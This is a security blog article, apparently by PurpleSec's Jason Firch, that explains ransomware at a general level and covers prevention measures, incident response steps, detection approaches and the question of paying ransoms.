what is a ransomware attack

How To Prevent Ransomware Attacks: An Expert Guide

Ransomware attacks grew 350% in 2018 reaching a total of 812 million infected devices and have been a serious concern for cities, hospitals, schools, and government agencies. As a result, global damage caused by ransomware grew from $11.5 billion in 2019 to $20 billion in 2020.

 

However, you can mitigate or prevent ransomware attacks by implementing user education and training, automating backups, minimizing attack surfaces, having an incident response plan, installing endpoint monitoring and protection across your fleet, and purchasing ransomware insurance. Ransomware can lie dormant and infect your backups before triggering and locking you out of systems. In this case, physical and offsite backups can be implemented as an additional layer of security.

 

Article Navigation

 

 

IT Security Policy Template download

 

What Is Ransomware?

 

what is ransomwareRansomware is a type of malicious software designed to deny users access to the files on their computer. It accomplishes this by encrypting these files so that only the malware operator can decrypt them.

 

A wide range of ransomware variants exists, including Ryuk, LockerGoga, and thousands of others. New variants are developed on a daily basis and used by threat actors against specific targets and for different purposes.

 

Ransomware attacks are so successful because they are so simple and have a clear psychological impact upon their target. They can infect any type of computer (laptops/desktops, mobile devices, IoT, routers, cloud storage, etc.) and deny the owner access to the data stored on these systems.

 

Read More: How To Develop & Implement A Network Security Plan

 

How Do You Prevent Ransomware Attacks?

 

By the time the ransom message pops up on a machine, it is too late to save the system. Taking steps in advance can help to protect against and prevent a cyber attack from occurring in the first place.

 

In 2017 and 2018, the majority of ransomware attacks were untargeted. Going into 2019, ransomware tactics shifted to target larger organizations with the capability to pay more substantial ransoms.

 

These attacks use tailored pretexts to trick targets, enabling them to infect and encrypt endpoints and spread across the network often costing organizations hundreds of thousands if not millions in damages.

 

 

User Education and Training

 

Many malware types, including ransomware, are spread via phishing and other social engineering attacks. Training users to recognize these threats can decrease risk of infection.

 

Automated Backups

 

Ransomware attacks force targets to pay for access to encrypted files. If recent backups exist, there is no reason to pay the ransom. It’s important to keep in mind that offline and offsite backups may also be used as an additional layer of security should backups become infected.

 

Cloud drives like OneDrive or Google Drive are not an acceptable way to handle your backups. If your computer can be connected and is mapped to the cloud drive then you’re still susceptible to a ransomware attack.

 

Minimize Attack Surface

 

Malware commonly takes advantage of existing vulnerability, insecure services (like RDP), and tools like PowerShell. Keeping vulnerabilities patched, antivirus updated, and unnecessary services disabled reduces attack surface.

 

Incident Response Plan

 

In the wake of a ransomware attack, responding rapidly and correctly is essential. Having a plan in place ensures that the IT/security team properly handles a potential incident.

 

Endpoint Monitoring and Protection

 

Identifying ransomware infections early can make it possible to terminate the attack before too much damage is done. Endpoints should have monitoring solutions in-place and the ability to automatically terminate potential infections.

 

Ransomware Insurance

 

Recovering from a ransomware attack can be expensive. Having ransomware insurance in place can minimize the cost to the organization.

 

vulnerability management plan template

 

What Do You Do If You Fall Victim To A Ransomware Attack?

 

If a system has been infected by ransomware, a quick response is essential. Ransomware rapidly encrypts files and attempts to spread itself to other systems, meaning that the impact of an attack grows rapidly if a response is delayed.

 

If a ransomware attack is detected, take the following actions:

 

  • Quarantine the affected system: Ransomware variants will often try to spread themselves through the network. This can be done simply by unplugging the network cable.
  • Notify the IT/security team: The team should have recovery procedures in place.
  • Do not restart the computer: Some ransomware variants accidentally encrypt critical system files. A computer may not power back on after infection.
  • Make a copy of the infected drive: Some ransomware decryptors, like Ryuk, will accidentally destroy files, even with the correct key.
  • Attempt disk decryption with ransomware decryption tools: Decryptors have been released for flawed ransomware variants and may be able to perform decryption.
  • Restore infected systems from clean versions: Ransomware may have persistence mechanisms that make them difficult to remove without a full wipe.
  • Restore systems from clean backups: If possible, restore systems from backups that predate the ransomware infection. Always restore from a copy to protect the original.
  • Sanitize removable media, connected drives, etc.: Ransomware commonly tries to spread by infecting other connected drives. These should be quarantined and sanitized to remove the infection.

 

How Does A Ransomware Attack Work?

 

Ransomware is a type of malware designed to use modern encryption algorithms to make money for cybercriminals. Encryption algorithms in common use today, like the Advanced Encryption Standard (AES), is impossible to crack using modern technology.

 

Most ransomware is automated and commonly spread through social engineering techniques, such as phishing, with the purpose of denying businesses access to mission-critical files and data.

 

Post-infection, the risk of losing this data forever drives individuals and organizations to pay the ransom.

 

8 steps to how a ransomware attack works

 

The steps below are a simplistic view of how a ransomware attack works to infect a network within an organization:

 

  • Step 1: a threat actor sends an email with an attachment to a malicious link.
  • Step 2: The email bypasses the spam filter hitting the users inbox.
  • Step 3: A user receives the malicious email and clicks a link, or downloads an attachment.
  • Step 4: The antivirus fails to block the threat.
  • Step 5: Malware XYZ.exe is delivered and the payload is executed on to the user’s machine.
  • Step 6: The victim’s files are encrypted by the malware.
  • Step 7: A ransom note is sent typically asking for payment in untraceable bitcoin.
  • Step 8: Attackers move laterally across an organization to spread the virus and maximize the effectiveness of the attack.

 

Once data has been encrypted by one of these algorithms, the only way to access it is with the corresponding encryption key.

 

Cybercriminals take advantage of this fact by infecting target machines with malware. One of the most common ways of doing so is through spear-phishing emails. For example, an email with an attached Microsoft Word document will use Word macros (or other means) to download and execute ransomware malware.

 

Or, they may target executive assistants pretending to be a C-level executive requesting a transfer of funds or the purchase of gift cards:

example of a spear phishing attack 02

Once on the machine, the malware starts encryption of the user’s files. The type of ransomware variants will determine how files are encrypted. Some may perform wholesale encryption of files, leaving only those that are essential to the operation of the computer.

 

Others perform more targeted attacks, selecting files that are more likely to be of value to the target.

 

Many ransomware variants will also attempt to spread themselves to other systems after the initial infection. WannaCry is famous for using the EternalBlue exploit as the primary infection mechanism, but many modern variants will look for connected removable media (i.e. USB drives), attached drives, or file servers.

 

If any of these are detected, the ransomware will copy itself over and infect those as well.

 

how does a ransomware attack work

 

After encryption is completed, the ransomware will display a ransom message to the user. The image above is an example of this, but the details vary from variant to variant. These messages typically demand a ransom in Bitcoin in exchange for the user’s decryption key and software.

 

The growth of ransomware has also been facilitated by the creation of Ransomware-as-a-Service (RaaS). With RaaS, ransomware authors sell their services or kits to less sophisticated users that use them to perform ransomware attacks against targets of their choice.

 

This enables less skilled cybercriminals to carry out attacks while making a profit for ransomware authors.

 

Who Are Most At Risk Of A Ransomware Attack?

 

In the past, ransomware attackers preferred a “quantity over quality” approach. Ransomware outbreaks like WannaCry tried to infect as many computers as possible and requested a small ransom from each.

 

However, this approach proved not to be cost-effective for attackers. For the average user, the process of purchasing and sending Bitcoin to pay a ransom is over their head.

 

As a result, cybercriminals either did not receive ransoms or had to waste time on customer support, which cut into their profits.

 

The modern ransomware threat targets larger organizations and demands more substantial ransom payments from each target. Common targets include:

 

 

Read More: 10 Cyber Security Trends You Can’t Ignore In 2021

 

The impact of a ransomware attack can vary greatly. Some targets got off relatively lightly, either paying a small ransom, restoring from backups, or writing off the lost data. Other organizations paid a much higher price.

 

In May 2019, the city of Baltimore, Maryland was targeted by ransomware.

 

The cybercriminals demanded approximately $80,000 in ransom to enable the city to regain access to the city’s computer systems. However, on the advice of the Secret Service and the FBI, the city elected not to pay.

 

In the end, the price tag of the Baltimore ransomware attack was approximately $18 million. The city accepted this price tag as the cost of sticking to its principles.

 

Paying the ransom would have enabled the cybercriminals to fund additional attacks against other targets. Additionally, being willing to pay the ransom can make an organization a greater target in the future since it is seen as an “easy mark”.

 

While Baltimore choose not to pay the ransom, not every organization or city makes this choice. Numerous cities, including West Haven, Connecticut and Valdez, Alaska, chose to pay a “one-time fee” rather than accept the additional costs of recovering on their own.

 

The Ransom Payment Dilemma – Should You Pay?

 

Best practice says that organizations should never pay a ransom after an attack. However, in some cases, business drivers force organizations to pay in order to regain access to critical data. For example, if the value of the data is significant enough to force companies into making a payment, such as proprietary intellectual property.

 

The FBI recently released documentation outlining what to consider before paying a ransom:

 

should you pay ransomware ransoms

 

In practice, no real consensus exists on the topic of whether or not to pay a ransom. Additional factors mean that the choice is not always as simple as whether or not to pay.

 

On the one hand, paying a ransom theoretically gives an organization access to its encrypted data. However, this is not always the case. In fact, the decryptor for the Ryuk variant of ransomware has a programming bug that accidentally drops the last byte of a decrypted file.

 

In many files, this byte is unneeded padding, but, in others, it is essential to opening and parsing the file.

 

On the other hand, failing to pay a ransom means that the attacker gets nothing for their attack. Since the goal of a ransomware attack is to make a profit, some cybercriminals are taking action to prevent this. Some ransomware variants now steal sensitive data before encrypting it.

 

If the victim refuses to pay the ransom, the attacker threatens to sell this data to a competitor or publicly release it. If this data contains sensitive customer data, it would be considered a data breach under the General Data Protection Regulation (GDPR) and similar data privacy laws.

 

How Do You Identify Ransomware On Your Network?

 

Like any type of malware, some ransomware variants can be detected using traditional signature-based antivirus and antimalware solutions.

 

However, malware authors are increasingly using zero-day attacks and polymorphic malware to evade these detection systems. As a result, signature-based antivirus only detects about half of malware.

 

The nature of ransomware also means that it can be detected by other means. In order to perform bulk encryption of a user’s files, the malware must open a large number of files, encrypt them, and destroy the original versions.

 

Since these are not actions typically taken by a legitimate user, they can be used to help detect and prevent a ransomware attack.

 

An organization’s security information and event management (SIEM) solution and intrusion prevention systems (IPS) can be configured to include rules to detect these activities and take action.

 

If a program on a computer is exhibiting this behavior, it should be immediately killed to minimize the impact of an attack.

 

Ransomware can also be detected based upon its use of built-in functionality on a target computer. Many malware variants are now designed to “live off the land” by using Microsoft PowerShell to download and run malware.

 

Similarly, ransomware commonly accesses the operating system’s embedded cryptographic libraries for encryption. Monitoring for use of these functions can also help to detect and block ransomware on a system.

 

Conclusion

 

Ransomware is a significant security threat to any organization, but it’s entirely preventable. Taking action to minimize the probability of infection and ensuring that clean backups are available for system restoration can dramatically decrease the cost associated with a ransomware attack.

 

Related Articles

 

Jason Firch, MBA

Jason is a veteran IT operations manager, digital marketer, as well as the co-founder and CEO of PurpleSec, with nearly a decade of experience in business management and operations. When he's not studying for his CISSP or contributing to the PurpleSec blog you'll find Jason helping nonprofits with their online marketing.

No Comments

Post a Comment

Comment
Name
Email
Website